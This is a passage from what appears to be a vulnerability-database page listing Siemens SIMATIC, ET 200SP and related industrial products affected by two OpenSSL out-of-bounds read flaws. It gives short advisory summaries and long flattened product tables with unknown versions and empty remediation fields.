Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
Multiple OpenSSL versions have an out-of-bounds read/write vulnerability in RFC 3211 KEK unwrap related to password-based CMS decryption, with moderate severity due to low exploit likelihood, affecting products including NetApp, Oracle, and SAP components.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
A low-severity out-of-bounds read vulnerability in OpenSSL HTTP client API occurs when the 'no_proxy' environment variable is set and the HTTP URL contains an IPv6 address, causing denial of service via application crash in multiple products including Oracle PeopleSoft and NetApp devices.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
